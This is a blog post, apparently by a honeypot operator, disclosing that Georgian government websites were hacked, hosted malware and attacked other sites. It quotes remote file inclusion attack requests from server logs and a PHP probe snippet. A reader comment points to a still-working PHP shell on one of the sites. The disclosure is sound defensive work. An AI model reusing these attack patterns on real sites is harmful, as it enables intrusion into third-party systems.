Georgia government sites hacked (and spreading malware)

*UPDATE: A few hours after this post, they removed the malware from and other sites. I am glad we had some effect.

You know, you would think that after all the attacks that Georgia suffered in 2008 they would be more careful about the security of their sites.

Well, not really. Even after I sent a bunch of emails to all their addresses that I could find and requested on twitter for contacts in the .ge government, nobody replied and they are still hacked, spreading malware and attacking other systems.

It doesn’t look like it is being caused by the Russians or anything like that. And the attackers this time didn’t defaced their web page. They just added some malware and scripts to attack others.

How do I know? We run multiple honeypots to detect web-based attacks and malware. And guess who started attacking us?


I started seeing the first attacks on January 12th, trying to load RFI (remote files) from

a.b.147.154 – – [12/Jan/2010:14:05:43 -0200] “GET ///?_SERVER[DOCUMENT_ROOT]= HTTP/1.1″ 200 6312 “-” “Mozilla/5.0”
a.b..147.154 – – [12/Jan/2010:14:05:46 -0200] “GET /xxx//?_SERVER[DOCUMENT_ROOT]= HTTP/1.1″ 200 7281 “-” “Mozilla/5.0”

A few days later I started seeing more attacks using malware hosted from

a.b.63.102 – – [14/Jan/2010:03:04:23 -0200] “GET /xxx*.php?page= HTTP/1.1″ 200 36 “-” “Mozilla/5.0”

That’s when I decided to look deeper at the issue. The respon1.txt is a common file used on RFI attacks:

$ lynx –dump –source
< ?php /* Fx29ID */ echo("FeeL"."CoMz"); echo("FeeL"."CoMz"); /* Fx29ID */ ?>

Then I went to look at this “album” directory and that really shocked me. When you visit you can see a full collection of malware:

From the showing credentials to control a botnet, to flooding tools, remote shells, they got everything.


A look at the top of the simbah.txt shows a “funny” message:

# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
# % private hackers pwned your box %
# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%

Even a remote proxy is there at

Attacking others

If that was not bad enough, by the end of January I started to see their own IP addresses attacking others: – – [01/Feb/2010:04:41:09 -0200] “GET //include/write.php?dir= HTTP/1.1” 200 36 “-” “libwww-perl/5.805” – – [01/Feb/2010:04:41:09 -0200] “GET /xxx/include/write.php?dir= HTTP/1.1” 200 36 “-” “libwww-perl/5.805” – – [23/Jan/2010:16:07:29 -0200] “GET /xxx/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS;=&mosConfig;_absolute_path= HTTP/1.1” 200 36 “-” “Mozilla/5.0”

So, at the end, we have some sites from the Georgia government hosting malware and these 4 attacking others: – (redirects now to – – –

If you have any contact at the Georgie government, let them know about this post. I have been trying to speak with someone since January without success. Maybe with some extra exposure they will notice and fix it.

  1. lol the batik.php still works. The password for the PHP Shell is inside the batik.txt. Dont know wich Provider they use, but it looks like that they need a big kick in their a.. or the Securityfolks of Unbelievable.

  2. I know websites are not perfect as I've been working on such governmental projects in Georgia, but most of problems come from website "administrators". They don't know how to keep their PCs secure.

Comments are closed.

You May Also Like